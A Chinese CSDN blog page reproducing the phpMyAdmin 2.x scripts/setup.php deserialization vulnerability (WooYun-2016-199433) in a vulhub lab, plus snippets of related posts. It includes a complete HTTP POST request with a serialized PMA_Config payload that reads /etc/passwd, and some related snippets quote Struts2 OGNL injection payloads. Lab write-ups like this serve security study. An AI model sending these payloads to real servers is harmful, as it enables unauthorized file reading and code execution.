phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)

最新推荐文章于 2024-06-09 23:00:35 发布
最新推荐文章于 2024-06-09 23:00:35 发布
阅读量306 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118937521
此篇博客揭示了PHPMyAdmin 2.x版本中的安全漏洞,攻击者可通过发送恶意数据包读取任意文件或执行代码,无需链接数据库。演示了如何利用该漏洞并提供复现步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞简介

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。
这个漏洞无需链接数据库,与数据库无关。

漏洞复现

发送如下数据包,即可读取/etc/passwd

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

在这里插入图片描述

phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1969
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
WooYun-2016-199433 phpmyadmin反序列化漏洞复现
alert['Hello World']
01-25 1294
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测漏洞利用漏洞加固 漏洞描述    影响版本 phpMyAdmin 2.x版本 漏洞环境搭建 漏洞分析 漏洞检测 漏洞利用 漏洞加固
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 549
Phpmyadmin Scripts / setup.php反序列化漏洞WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433
Grace_for_it的博客
05-03 745
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)
黑白的博客
12-14 426
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
[Vulhub](WooYun-2016-199433phpmyadmin反序列化漏洞
weixin_45605352的博客
04-25 1085
0x01 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化
phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433)(Kali)
Szero
05-01 570
phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433)(Kali)
漏洞复现】phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433
weixin_47443077的博客
06-06 686
漏洞复现】phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433) 0x01漏洞背景 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 0x02漏洞环境 vulhub的docker环境搭建 在/home/vulhub/phpmyadmin/WooYun-2016-199433目录下执行如下命令启动phpmyadmin: docker-compose up -d 查看开启的端口为8080 环
phpmyadmin scripts/setup.php 反序列化漏洞攻击实验
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
10-07 1031
msf攻击phpmyadmin 4.0x - 4.6.2 远程代码执行漏洞Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433) deserialization n 反序列化,还原序列化 目标(被攻击)计算机搭建漏洞环境: 攻击计算机启用漏洞攻击模块: 目标(被攻击)计算机退出漏洞环境: 攻击计算机退出漏洞攻击环境: ...
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 451
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
反序列化漏洞——http://159.75.16.25:8066 phpmyadmin scripts/setup.php 反序列化漏洞 http://159.75.16.25
m0_52341820的博客
04-14 522
php反序列化漏洞漏洞原理,如何防御此漏洞?如何利用此漏洞? 原理: 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果 防御: 进行签名与认证,避免应用接受黑客的异常输入 限制序列化与反序列化的类,避免接受任何处理类型 RASP检测,判断应用是否执行了非应用本身的逻辑 利用: 通过该漏洞,可以在内容中嵌入执行自定义命令的代码,获取服务器的权限 可以构造其他,导致耗尽服务器的CPU,停止服务 可以获得途径 2、http:
phpmyadmin反序列化漏洞WooYun-2016-199433
笑花大王
03-27 930
简介 环境复现:https://github.com/vulhub/vulhub 线上平台:榆林学院内可使用协会内部的网络安全实验平台 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具 影响版本 1 1 代码审计 1 利用过程 http://192.168.52.129:8080/scripts/setup.php 发送如下数据包,即可读取/etc/pass...
phpmyadmin scripts/setup.php 反序列化漏洞复现
weixin_56513549的博客
02-23 2109
首先在password地方输入%{1+1} 发现解析成了2,说明存在该漏洞 输入 %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"} 获取Tomcat执行路径 获取web路径 %{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get("com.opensymphony.xwork2.dispatch..
phpmyadmin scripts/setup.php 反序列化漏洞 S2-001远程代码执行漏洞复现漏洞要求:
记录笔记
04-12 296
phpmyadmin scripts/setup.php S2-001远程代码执行漏洞复现漏洞 我们在密码处输入:%{2*2} 会回显出执行的结果,说明漏洞可能存在 %{“tomcatBinDir{”+@java.lang.System@getProperty(“user.dir”)+“}”} %{ #req=@org.apache.struts2.ServletActionContext@getRequest(), #response=#context.get(“com.opensymp
WooYun-2016-199433 -phpmyadmin-反序列化RCE-getshell
最新发布
qq_29060627的博客
06-09 703
靶场环境存在 /usr/local/lib/php/pearcmd.php,并且开启了register_argc_argv选项。包含一下/tmp/99;
Phpmyadmin 2.X 反序列化漏洞WooYun-2016-199433
jammny
11-28 1430
一、漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 二、漏洞影响 phpmyadmin 2.x 三、漏洞分析 https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ 四、漏洞利用 访问漏洞存在页面,并用bp进行抓包 更改请求为post并添加如下payload后发送,即可读取/etc/passwd: action=jammny&configurati.
漏洞复现-Phpmyadmin setup.php反序列化漏洞WooYun-2016-199433
01-04 4586
phpMyAdminSetup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpmyadmin/scripts/setup.php,关于phpmyadmin2.8及以后版本的安装
weixin_29584723的博客
03-20 319
关于phpmyadmin2.8及以后版本的安装2021-01-21 2:01:16840解压缩后放到网站根目录下跟以前的版本一样。但是新增一个scripts/setup把我给弄糊涂了下面是转载的一个台湾人的blog以下是引用片段:這幾天phpmyadmin出了新版2.8.0.1,版號算是又往前邁進了一步,於是找了個時間換了一下這個新版。如果整件事情只有這樣的話,那也沒什麼好講的啦!就是因為過程中有...
我的后台服务为什么会有 /phpMyAdmin-2.10.3/scripts/setup.php的访问记录
06-09
这可能是因为您的服务器安装了 phpMyAdmin,而 /phpMyAdmin-2.10.3/scripts/setup.phpphpMyAdmin 的一部分。setup.php 是用于安装和配置 phpMyAdmin 的脚本,因此如果有关于它的访问记录,可能是有人试图在您的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值